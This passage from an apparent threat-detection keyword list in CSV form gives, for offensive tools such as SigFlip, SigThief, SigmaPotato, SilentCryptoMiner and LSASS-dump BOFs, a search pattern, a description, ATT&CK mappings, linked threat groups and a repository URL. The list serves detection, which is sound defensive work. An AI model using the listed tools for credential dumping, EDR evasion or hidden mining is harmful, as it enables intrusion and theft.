Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59442"
"*SigInject *",".{0,1000}SigInject\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59443"
"*SigInject *.dll*",".{0,1000}SigInject\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59444"
"*SigLoader *",".{0,1000}SigLoader\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59445"
"*Sigloader *.dll*",".{0,1000}Sigloader\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59446"
"*SigLoader.*",".{0,1000}SigLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59447"
"*SigLoader/sigloader.c*",".{0,1000}SigLoader\/sigloader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59448"
"*SigmaPotato.exe*",".{0,1000}SigmaPotato\.exe.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","59449"
"*SigmaPotatoCore.exe*",".{0,1000}SigmaPotatoCore\.exe.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","59450"
"*signal2john.py*",".{0,1000}signal2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","59451"
"*Signal-Labs/NtdllUnpatcher*",".{0,1000}Signal\-Labs\/NtdllUnpatcher.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","59452"
"*SignToolEx.exe*",".{0,1000}SignToolEx\.exe.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","59454"
"*SignToolExHook.dll*",".{0,1000}SignToolExHook\.dll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","59455"
"*SignToolEx-main*",".{0,1000}SignToolEx\-main.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","59456"
"*SigPloit*",".{0,1000}SigPloit.{0,1000}","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Reconnaissance","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","N/A","2","164","56","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z","59457"
"*sigthief.exe.manifest*",".{0,1000}sigthief\.exe\.manifest.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","59458"
"*SigThief.py*",".{0,1000}SigThief\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","59459"
"*Sigthief.py*",".{0,1000}Sigthief\.py.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59460"
"*sigthief.py*",".{0,1000}sigthief\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","59461"
"*SigThief-master*",".{0,1000}SigThief\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","59462"
"*sigwhatever.exe*",".{0,1000}sigwhatever\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","59463"
"*'Sil'+'ent'+'l'+'yContinu'+'e'*",".{0,1000}\'Sil\'\+\'ent\'\+\'l\'\+\'yContinu\'\+\'e\'.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","59464"
"*SilenceDefender.ps1*",".{0,1000}SilenceDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59465"
"*SilenceDefender_ATP.log*",".{0,1000}SilenceDefender_ATP\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","#logfile","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59466"
"*SilenceDefender_ATP.ps1*",".{0,1000}SilenceDefender_ATP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59467"
"*Silent Crypto Miner Builder*",".{0,1000}Silent\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","59468"
"*Silent Lsass Dump*",".{0,1000}Silent\sLsass\sDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","0","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","59469"
"*Silent.Crypto.Miner.Builder.zip*",".{0,1000}Silent\.Crypto\.Miner\.Builder\.zip.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","","N/A","","","","59470"
"*silentbreaksec/Throwback*",".{0,1000}silentbreaksec\/Throwback.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","59471"
"*SilentCleanupWinDirBOF*",".{0,1000}SilentCleanupWinDirBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","59472"
"*SilentCryptoMiner.sln*",".{0,1000}SilentCryptoMiner\.sln.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","59473"
"*SilentCryptoMiner-scm-v*",".{0,1000}SilentCryptoMiner\-scm\-v.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","","N/A","","","","59474"
"*silenthound.py*",".{0,1000}silenthound\.py.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","59475"
"*silenthound_enum*",".{0,1000}silenthound_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59476"
"*silenthound_output_*.txt*",".{0,1000}silenthound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59477"
"*SilentHound-main*",".{0,1000}SilentHound\-main.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","59478"
"*silentLsassDump*",".{0,1000}silentLsassDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","59479"
"*SilentMoonwalk.cpp*",".{0,1000}SilentMoonwalk\.cpp.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59480"
